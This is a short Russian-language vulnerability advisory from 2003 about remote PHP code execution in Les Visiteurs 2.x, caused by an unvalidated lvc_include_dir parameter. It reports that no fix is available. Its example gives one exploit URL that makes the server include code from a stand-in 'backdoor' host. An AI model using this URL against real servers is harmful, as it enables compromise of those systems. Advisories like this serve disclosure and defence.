Security Lab

Выполнение произвольного PHP кода в Les Visiteurs

Дата публикации:29.10.2003
Всего просмотров:2888
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Les Visiteurs 2.x
Уязвимые версии: Les Visiteurs 2.x

Описание: Уязвимость обнаружена в Les Visiteurs. Злонамеренный пользователь может получить доступ к системе.

Сценарии "include/new-visitor.inc.php" и "include/config.inc.php" не проверяют фактическое расположение сценариев lang/.inc.php и db/db_mysql.inc.php, представленных а параметре lvc_include_dir.

Пример/Эксплоит:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/

URL производителя: http://chezwam.net/main/publications/lesvisiteurs/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.